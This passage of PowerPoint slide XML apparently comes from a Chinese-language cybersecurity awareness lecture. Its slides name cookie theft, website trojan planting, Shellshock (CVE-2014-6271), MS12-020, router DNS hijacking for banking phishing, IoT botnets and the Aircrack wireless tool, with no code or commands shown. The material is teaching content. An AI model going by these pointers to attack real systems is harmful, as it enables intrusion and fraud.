              <a:t>改网页内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>窃</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>取用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>站挂马等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="图片搜索结果"/>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06577" y="2403824"/>
            <a:ext cx="7685423" cy="4454176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="281104923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471986"/>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2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="840166"/>
            <a:ext cx="8494644" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>安全配置错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>暴露</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>敏感</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1944495" y="1488698"/>
            <a:ext cx="5200462" cy="5115639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6112184" y="1486496"/>
            <a:ext cx="5842975" cy="5115639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27656" name="Picture 8" descr="http://img.weixinyidu.com/160317/bf8cf6fa.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156970" y="2670837"/>
            <a:ext cx="1798189" cy="17903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45829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967141"/>
            <a:ext cx="8494644" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【2】</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络安全</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Heiti SC Light"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>操作系统安全（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2014-6271</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="1627416"/>
            <a:ext cx="4905093" cy="4102264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6769955" y="1627416"/>
            <a:ext cx="5268704" cy="4102264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="54163000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967141"/>
            <a:ext cx="8494644" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>操作系统（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MS12-020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1969009" y="1551916"/>
            <a:ext cx="8067689" cy="4821836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2052" name="Picture 4" descr="http://imgsrc.baidu.com/forum/w%3D580/sign=8fff152d520fd9f9a0175561152dd42b/3bf4b6025aafa40f2ffcf48ca864034f78f019a8.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14841" y="511986"/>
            <a:ext cx="1451295" cy="9103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232222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文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2470451" y="2503071"/>
            <a:ext cx="7512473" cy="3293594"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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0x01 </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网络安全的大环境与背景</a:t>
            </a:r>
          </a:p>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0x02 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网</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络安全面临的问题</a:t>
            </a:r>
          </a:p>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sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>常</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见安全类型</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2667" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Heiti SC Light"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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0x04 </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sz="2667" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Heiti SC Light"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>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0x05 </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小试牛刀</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2667" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Heiti SC Light"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2667" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0x06 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>致</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2667" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>辞感谢</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2667" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Heiti SC Light"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2470451" y="1549953"/>
            <a:ext cx="7824893" cy="666786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3733" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
              </a:rPr>
              <a:t>提纲</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="353160363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1137009"/>
            <a:ext cx="8494644" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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【2】</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络安全</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网络设备安全</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="1783340"/>
            <a:ext cx="9050827" cy="4998842"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="318533977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712462" y="478548"/>
            <a:ext cx="2852063" cy="452432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>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39634" y="1190574"/>
            <a:ext cx="9666738" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>轻</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>松获取路由器的管理控制权限，修改</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行网银钓鱼欺骗，后果不堪设想。。。。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="139634" y="1783339"/>
            <a:ext cx="5771079" cy="4922037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5910713" y="1783340"/>
            <a:ext cx="6179687" cy="4922037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="279281127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967141"/>
            <a:ext cx="8494644" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>僵</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尸网络设备，物联网。。。 加拿大的监控摄像头，网速满成狗。天朝的网络。。。</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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1719088" y="1336473"/>
            <a:ext cx="10128798" cy="5236605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="7867355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1186067"/>
            <a:ext cx="8494644" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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【3】</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移动安全</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无线网络的安全</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pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://gd3.alicdn.com/imgextra/i3/13914820/TB2VE9CtXXXXXbcXXXXXXXXXXXX_!!13914820.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64862" y="2051324"/>
            <a:ext cx="4438341" cy="4438341"/>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gd2.alicdn.com/imgextra/i2/13914820/TB2HomtX7WM.eBjSZFhXXbdWpXa_!!13914820.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03203" y="2051324"/>
            <a:ext cx="4438341" cy="4438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6526360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9543" y="103806"/>
            <a:ext cx="901664" cy="736360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1826762" y="113805"/>
            <a:ext cx="2852063" cy="452432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2052" name="Picture 4" descr="http://www.xitongzhijia.net/uploads/allimg/141204/53-14120414251O39.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21425" y="2838450"/>
            <a:ext cx="5715000" cy="40195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AutoShape 6" descr="http://img5.imgtn.bdimg.com/it/u=2718719846,3653868325&amp;fm=15&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68" name="Picture 20" descr="http://www.linuxdiyf.com/linux/uploads/allimg/160911/2-16091109461I59.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2838450"/>
            <a:ext cx="6321425" cy="40195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文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460375" y="840166"/>
            <a:ext cx="11452225" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aircrack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
